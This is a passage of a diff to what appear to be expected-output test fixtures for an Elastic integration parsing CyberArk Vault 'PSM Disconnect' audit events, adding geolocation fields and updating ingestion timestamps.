\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:54\",\"IsoTimestamp\":\"2021-03-14T13:49:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:18;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 
Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -890,17 +962,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -982,7 +1072,7 @@ "event": { "severity": 2, "duration": 54000000000, - "ingested": "2021-12-09T13:36:49.813812100Z", + "ingested": "2021-12-14T14:42:15.678832523Z", "original": "\u003c5\u003e1 2021-03-14T13:51:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:51:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:51:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:51:35\",\"IsoTimestamp\":\"2021-03-14T13:51:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:54;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 
Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -1006,17 +1096,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1096,7 +1204,7 @@ "event": { "severity": 2, "duration": 95000000000, - "ingested": "2021-12-09T13:36:49.813817400Z", + "ingested": "2021-12-14T14:42:15.678832916Z", "original": "\u003c5\u003e1 2021-03-15T10:33:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:33:30\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:33:30Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:33:30\",\"IsoTimestamp\":\"2021-03-15T10:33:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 
Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -1120,17 +1228,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1210,7 +1336,7 @@ "event": { "severity": 2, "duration": 73000000000, - "ingested": "2021-12-09T13:36:49.813822700Z", + "ingested": "2021-12-14T14:42:15.678833318Z", "original": "\u003c5\u003e1 2021-03-15T10:34:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:34:50\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:34:50Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:34:50\",\"IsoTimestamp\":\"2021-03-15T10:34:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 
Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -1234,17 +1360,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1324,7 +1468,7 @@ "event": { "severity": 2, "duration": 2230000000000, - "ingested": "2021-12-09T13:36:49.813828200Z", + "ingested": "2021-12-14T14:42:15.678833964Z", "original": "\u003c5\u003e1 2021-03-15T11:12:09Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 04:12:09\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T11:12:09Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 04:12:09\",\"IsoTimestamp\":\"2021-03-15T11:12:09Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 
Disconnect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "302", "kind": "event", @@ -1348,17 +1492,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -1434,7 +1596,7 @@ "event": { "severity": 2, "duration": 5000000000, - "ingested": "2021-12-09T13:36:49.813833500Z", + "ingested": "2021-12-14T14:42:15.678834463Z", "original": "\u003c5\u003e1 2021-03-15T13:18:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:18:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:18:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e302\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Disconnect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Disconnect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Disconnect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:18:36\",\"IsoTimestamp\":\"2021-03-15T13:18:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"302\",\"Desc\":\"PSM Disconnect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Disconnect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating 